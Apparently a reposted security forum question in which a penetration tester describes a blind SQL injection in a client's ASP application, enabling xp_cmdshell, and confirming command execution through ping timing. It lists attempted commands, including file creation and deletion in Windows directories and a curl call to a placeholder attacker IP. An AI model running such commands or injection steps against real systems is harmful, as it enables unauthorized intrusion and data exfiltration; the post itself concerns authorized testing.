• caglararli@hotmail.com
  • 05386281520

xp_cmdshell as dbo user only able to run ‘ping localhost’ to verify RCE?

Çağlar Arlı      -    10 Views

xp_cmdshell as dbo user only able to run ‘ping localhost’ to verify RCE?

I am doing a pentest on a client's ASP web application and I have identified a blind SQL injection. However, after enabling xp_cmdshell, I am only able to run the ping localhost command to verify the RCE, which has a 3-second delay. I also tried to run ping -n 10 localhost and it has a ~10s delay as well.

I am fairly certain that there is a RCE here but I can't seem to run other commands such as:

  • mkdir C:\Windows\Temp\pwned
  • mkdir C:\inetpub\wwwroot\pwned
  • del C:\Windows\Temp\randomFile
  • move C:\Windows\Temp\randomFile C:\Windows\Temp\randomFile2
  • curl http://attackerIP:80 (blocked by firewall)

I also managed to extract the username using the SELECT CURRENT_USER; command using the blind SQL vulnerability and it is dbo. The database version is MSSQL 2006.

What are some possible reasons that I am only able to run the ping localhost command and not others?